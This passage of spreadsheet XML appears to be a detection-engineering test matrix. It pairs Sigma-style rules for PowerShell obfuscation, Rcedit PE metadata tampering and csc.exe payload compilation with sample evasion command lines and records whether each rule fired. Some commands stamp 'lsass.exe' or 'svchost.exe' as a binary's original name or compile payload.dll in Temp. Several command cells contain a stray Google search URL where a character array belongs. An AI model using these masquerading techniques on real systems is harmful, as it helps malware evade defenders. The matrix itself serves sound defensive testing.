      <c r="G869" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H869" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I869" s="43" t="n"/>
      <c r="J869" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K869" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="870" ht="15.75" customHeight="1" s="42">
      <c r="A870" s="43" t="n"/>
      <c r="B870" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C870" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D870" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E870" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F870" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G870" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H870" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I870" s="43" t="n"/>
      <c r="J870" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K870" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="871" ht="15.75" customHeight="1" s="42">
      <c r="A871" s="43" t="n"/>
      <c r="B871" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C871" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D871" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E871" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I871" s="43" t="n"/>
      <c r="J871" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K871" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="872" ht="15.75" customHeight="1" s="42">
      <c r="A872" s="43" t="n"/>
      <c r="B872" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C872" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D872" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E872" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H872" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I872" s="43" t="n"/>
      <c r="J872" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K872" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="873" ht="15.75" customHeight="1" s="42">
      <c r="A873" s="43" t="n"/>
      <c r="B873" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C873" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D873" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E873" s="36" t="inlineStr">
        <is>
          <t>copy rcedit-x64.exe r.exe &amp;&amp; .\r.exe target.exe --set-version-string "Original""FileName" "svchost.exe"</t>
        </is>
      </c>
      <c r="F873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H873" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I873" s="43" t="n"/>
      <c r="J873" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K873" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="874" ht="15.75" customHeight="1" s="42">
      <c r="A874" s="43" t="n"/>
      <c r="B874" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C874" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D874" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E874" s="36" t="inlineStr">
        <is>
          <t>ren rcedit-x64.exe not_rcedit.exe &amp;&amp; .\not_rcedit.exe target.exe --set-version-string "OriginalFileName" "lsass.exe"</t>
        </is>
      </c>
      <c r="F874" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G874" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H874" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I874" s="36" t="n"/>
      <c r="J874" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K874" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="875" ht="15.75" customHeight="1" s="42">
      <c r="A875" s="43" t="n"/>
      <c r="B875" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_unicode_img</t>
        </is>
      </c>
      <c r="C875" s="36" t="inlineStr">
        <is>
          <t>Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image</t>
        </is>
      </c>
      <c r="D875" s="36" t="inlineStr">
        <is>
          <t>584bca0f-3608-4402-80fd-4075ff6072e3</t>
        </is>
      </c>
      <c r="E875" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "w^h^o^a^m^i"</t>
        </is>
      </c>
      <c r="F875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I875" s="36" t="n"/>
      <c r="J875" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K875" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="876" ht="15.75" customHeight="1" s="42">
      <c r="A876" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B876" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C876" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D876" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E876" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:C:\Temp\payload.exe C:\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I876" s="36" t="n"/>
      <c r="J876" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K876" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="877" ht="15.75" customHeight="1" s="42">
      <c r="A877" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B877" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C877" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D877" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E877" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:C:\Windows\Tasks\update.exe C:\Windows\Tasks\update.cs</t>
        </is>
      </c>
      <c r="F877" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G877" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H877" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I877" s="36" t="n"/>
      <c r="J877" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K877" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="878" ht="15.75" customHeight="1" s="42">
      <c r="A878" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B878" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C878" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D878" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E878" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe /target:library /out:C:\Windows\Temp\payload.dll C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F878" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G878" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H878" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I878" s="36" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J878" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K878" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="879" ht="15.75" customHeight="1" s="42">
      <c r="A879" s="43" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B879" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C879" s="43" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D879" s="43" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E879" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe -"target:library" /out:C:\Windows\Temp\payload.dll C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F879" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G879" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I879" s="43" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J879" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K879" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="880" ht="15.75" customHeight="1" s="42">
      <c r="A880" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B880" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C880" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D880" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E880" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe /"target:library" /ouT:c:\wIndows\TeMP\PaylOaD.dLL C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F880" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G880" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H880" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I880" s="43" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J880" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K880" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="881" ht="15.75" customHeight="1" s="42">
      <c r="A881" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B881" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C881" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D881" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E881" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe /tArGEt:LibrarY -"out:C:\Windows\Temp\payload.dll" C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F881" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G881" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H881" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I881" s="43" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J881" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K881" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="882" ht="15.75" customHeight="1" s="42">
      <c r="A882" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B882" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C882" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D882" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E882" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe /taRGeT:LIbrarY -"out:C:\Windows\Temp\payload.dll" C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F882" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G882" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H882" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I882" s="43" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J882" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K882" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="883" ht="15.75" customHeight="1" s="42">
      <c r="A883" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B883" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C883" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D883" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E883" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe -"target:library" -"out:C:\Windows\Temp\payload.dll" C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F883" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G883" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H883" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I883" s="43" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J883" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K883" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="884" ht="15.75" customHeight="1" s="42">
      <c r="A884" s="36" t="inlineStr">
        <is>
          <t>t1027.004</t>
        </is>
      </c>
      <c r="B884" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csc_susp_dynamic_compilation</t>
        </is>
      </c>
      <c r="C884" s="36" t="inlineStr">
        <is>
          <t>Dynamic .NET Compilation Via Csc.EXE</t>
        </is>
      </c>
      <c r="D884" s="36" t="inlineStr">
        <is>
          <t>dcaa3f04-70c3-427a-80b4-b870d73c94c4</t>
        </is>
      </c>
      <c r="E884" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Temp\compiler.exe &amp;&amp; C:\Windows\Temp\compiler.exe /tARGeT:liBRarY /OUT:c:\Windows\TEmp\PaYLoad.DLL C:\Windows\Temp\payload.cs</t>
        </is>
      </c>
      <c r="F884" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G884" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H884" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I884" s="43" t="inlineStr">
        <is>
          <t>Csc.EXE Execution Form Potentially Suspicious Parent (b730a276-6b63-41b8-bcf8-55930c8fc6ee)</t>
        </is>
      </c>
      <c r="J884" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K884" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="885" ht="15.75" customHeight="1" s="42">
      <c r="A885" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B885" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C885" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D885" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E885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885" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G885" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H885" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I885" s="43" t="n"/>
      <c r="J885" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K885" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="886" ht="15.75" customHeight="1" s="42">
      <c r="A886" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B886" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C886" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D886" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E886" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F886" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G886" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H886" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I886" s="43" t="n"/>
      <c r="J886" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K886" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="887" ht="15.75" customHeight="1" s="42">
      <c r="A887" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B887" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C887" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D887" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E887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887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I887" s="43" t="n"/>
      <c r="J887" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K887" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="888" ht="15.75" customHeight="1" s="42">
      <c r="A888" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B888" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C888" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D888" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E888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888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I888" s="43" t="n"/>
      <c r="J888" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K888" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="889" ht="15.75" customHeight="1" s="42">
      <c r="A889" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B889" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C889" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D889" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E889" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F889" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G889" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H889" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I889" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J889" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K889" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="890" ht="15.75" customHeight="1" s="42">
      <c r="A890" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B890" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C890" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D890" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E890" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F890" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G890" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H890" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I890" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J890" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K890" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="891" ht="15.75" customHeight="1" s="42">
      <c r="A891" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B891" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C891" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D891" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E891" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F891" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G891" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H891" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I891" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J891" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K891" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="892" ht="15.75" customHeight="1" s="42">
      <c r="A892" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B892" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C892" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D892" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E892" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F892" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G892" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H892" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I892" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J892" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K892" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="893" ht="15.75" customHeight="1" s="42">
      <c r="A893" s="36" t="n"/>
      <c r="B893" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C893" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D893" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E893" s="36" t="inlineStr">
        <is>
          <t>copy rcedit-x64.exe r.exe &amp;&amp; .\r.exe target.exe --set-version-string "Original""FileName" "svchost.exe"</t>
        </is>
      </c>
      <c r="F893" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G893" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H893" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I893" s="43" t="n"/>
      <c r="J893" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K893" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="894" ht="15.75" customHeight="1" s="42">
      <c r="A894" s="36" t="n"/>
      <c r="B894" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C894" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D894" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E894" s="36" t="inlineStr">
        <is>
          <t>ren rcedit-x64.exe not_rcedit.exe &amp;&amp; .\not_rcedit.exe target.exe --set-version-string "OriginalFileName" "lsass.exe"</t>
        </is>
      </c>
      <c r="F894" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G894" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H894" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I894" s="36" t="n"/>
      <c r="J894" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K894" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="895" ht="15.75" customHeight="1" s="42">
      <c r="A895" s="36" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B895" s="36" t="inlineStr">
        <is>
